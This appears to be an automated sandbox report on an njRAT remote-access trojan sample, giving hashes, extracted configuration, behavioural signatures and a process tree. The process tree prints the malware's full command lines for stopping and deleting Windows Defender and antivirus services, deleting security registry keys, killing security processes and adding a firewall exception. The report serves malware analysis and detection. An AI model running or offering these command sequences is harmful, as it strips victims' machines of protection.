Analysis
- max time kernel: 153s
- max time network: 151s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 29-09-2021 07:52
Static task: static1
Behavioral task: behavioral1
Sample: e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
Resource: win7v20210408
General
- Target: e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
- Size: 341KB
- MD5: e8fb8e14c5e50dd51a7499b84e2c857a
- SHA1: bad853c5496bc28f492c01cdc6fff77efd72dc74
- SHA256: e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c
- SHA512: 2b15a3c3cb4b04f978043d45ac32ed2ab7dfef11ec0b6010a73a2d39b8aa112b18846cb60383c63108fd7bcd4c7f9abae26b354320902a59f923d436d73f4131
Malware Config
Extracted
- Family: njrat
- Version: 0.7d
- Botnet: cvcvc
- C2: 127.0.0.1:6544
- Mutex: f08ba698cf12b161ed2e70452386d723
- Attributes:
  - reg_key: f08ba698cf12b161ed2e70452386d723
  - splitter: Y262SUCZ4UJJ
Signatures
- Modifies security service (2 TTPs, 2 IoCs)
  Processes (description | ioc | process):
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | reg.exe
- Nirsoft (5 IoCs)
  Processes (resource | yara_rule):
  C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe | Nirsoft (5 identical rows)
- Executes dropped EXE (5 IoCs)
  Processes (pid | process):
  2620 | AdvancedRun.exe
  3488 | AdvancedRun.exe
  2640 | AdvancedRun.exe
  2220 | AdvancedRun.exe
  2868 | cd.exe
- Modifies Windows Firewall (1 TTPs)
- Stops running service(s) (3 TTPs)
- Drops file in Program Files directory (64 IoCs)
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (5 IoCs)
  Processes (pid | process):
  1920 | taskkill.exe
  1304 | taskkill.exe
  752 | taskkill.exe
  652 | taskkill.exe
  3888 | taskkill.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid | process | identical rows):
  2620 | AdvancedRun.exe | 4
  3488 | AdvancedRun.exe | 4
  2640 | AdvancedRun.exe | 4
  2220 | AdvancedRun.exe | 4
  2868 | cd.exe | 48
- Suspicious use of AdjustPrivilegeToken (48 IoCs)
  Processes (pid | process | token privilege):
  2620 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
  3488 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
  2640 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
  2220 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
  652 | taskkill.exe | SeDebugPrivilege
  3888 | taskkill.exe | SeDebugPrivilege
  1920 | taskkill.exe | SeDebugPrivilege
  1304 | taskkill.exe | SeDebugPrivilege
  752 | taskkill.exe | SeDebugPrivilege
  2868 | cd.exe | SeDebugPrivilege, followed by 33 and SeIncBasePriorityPrivilege alternating (17 rows each)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid | source process | target pid | target process | identical rows):
  2160 | e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe | 2620 | AdvancedRun.exe | 2
  2620 | AdvancedRun.exe | 3488 | AdvancedRun.exe | 2
  2160 | e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe | 2640 | AdvancedRun.exe | 2
  2640 | AdvancedRun.exe | 2220 | AdvancedRun.exe | 2
  2160 | e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe | 3552 | cmd.exe | 3
  3552 | cmd.exe | 1204, 680, 1160, 3328, 1972, 1236, 1424, 904, 900, 3896, 3888, 3404, 3440, 1540, 1000, 3180, 2868 | sc.exe | 3 each
  3552 | cmd.exe | 1500 | sc.exe | 2
Processes
- C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 2620
      signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 2640
      signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat" "
    signatures: Drops file in Program Files directory; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop windefend
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config windefend start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete windefend
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop WdNisSvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config WdNisSvc start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete WdNisSvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop Sense
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config Sense start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete Sense
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop wuauserv
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config wuauserv start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop usosvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config usosvc start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop WaasMedicSvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config WaasMedicSvc start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop SecurityHealthService
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config SecurityHealthService start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete SecurityHealthService
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop SDRSVC
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config SDRSVC start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop wscsvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config wscsvc start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop WdiServiceHost
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config WdiServiceHost start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop WdiSystemHost
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config WdiSystemHost start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop InstallService
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config InstallService Start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop VaultSvc
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config VaultSvc start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop Spooler
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config Spooler start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop LicenseManager
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config LicenseManager start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop DiagTrack
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config DiagTrack start= disabled
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im smartscreen.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im SecurityHealthService.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im SystemSettings.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
    - C:\Windows\SysWOW64\reg.exe
      cmdline: reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
      signatures: Modifies security service
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete windefend
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete sense
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop MBAMService
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config MBAMService start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete MBAMService
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im MBAM.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop Bytefenceservice
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete Bytefenceservice
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config Bytefenceservice start= disabled
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im Bytefence.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop "avast! Tools"
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config "avast! Tools" start= disabled
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete "avast! Tools"
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc stop "avast! Antivirus"
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc config "avast! Antivirus" start= disabled
  - C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\netsh.exe
      cmdline: netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe" "cd.exe" ENABLE
Downloads
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe
  MD5: 9125a507060e4b3a3e287452cb71e7a1
  SHA1: fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
  SHA256: 29c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
  SHA512: 5282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe
  MD5: 41d608740bb964b50c7b79d28838a1c1
  SHA1: b604f184bcfb2fb1c533d02e43e572a90c2df080
  SHA256: 826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d
  SHA512: 1e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat
  MD5: fedd9cb5e3ffd5436e973e7a627f3d3c
  SHA1: d6b5eb6d7663b927afc92d5c890296e911bd9336
  SHA256: ccd0633359705388d3597b9af4589498faca61acad2ec0be2711cd73cf47c774
  SHA512: 604e97d7fe1e5a7b72ad701625838546c7681352db507d6b0ff5f3dd4bef41d705f044f074391d12e3f316b88669df7163bfd37ec6dd0184a956f25ebd737911